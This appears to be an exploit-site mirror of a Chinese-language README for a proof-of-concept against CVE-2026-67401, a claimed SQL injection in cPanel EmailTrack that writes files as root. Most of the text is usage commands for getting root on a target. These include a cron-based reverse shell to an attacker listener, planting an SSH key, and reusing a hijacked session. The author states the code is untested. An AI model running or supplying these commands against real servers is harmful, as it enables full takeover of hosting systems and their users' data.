## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AXEDOS-CVE-2026-67401
# CVE-2026-67401
cPanel EmailTrack 中的 SQL 注入漏洞。拥有邮件权限的已认证 cPanel 用户可通过 SQLite ATTACH DATABASE 以 root 身份写入任意文件。一次请求即可获得 root 权限。尚未在真实目标上测试,代码仅根据公开信息和基础 diff 对比拼凑而成。请作为研究人员自行尽职验证,尝试运行并提交 PR 修复。
影响 2026 年 9 月 8 日补丁之前的所有 cPanel/WHM 版本。
## 所需条件
* 目标服务器上拥有邮件权限的有效 cPanel 账户
* Python 3、`requests` 库
* 若使用反弹 Shell 载荷,则需要一个监听器
## 使用方法
root@kitploit:~
# 通过 cron 反弹 Shell
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# 投放 SSH 密钥
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# 使用现有会话
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# 试运行(打印请求,不发送)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1
# 修复版本
* 11.138.0.4(CURRENT/EDGE)
* 11.136.0.39(RELEASE/STABLE)
* 11.134.0.55(LTS)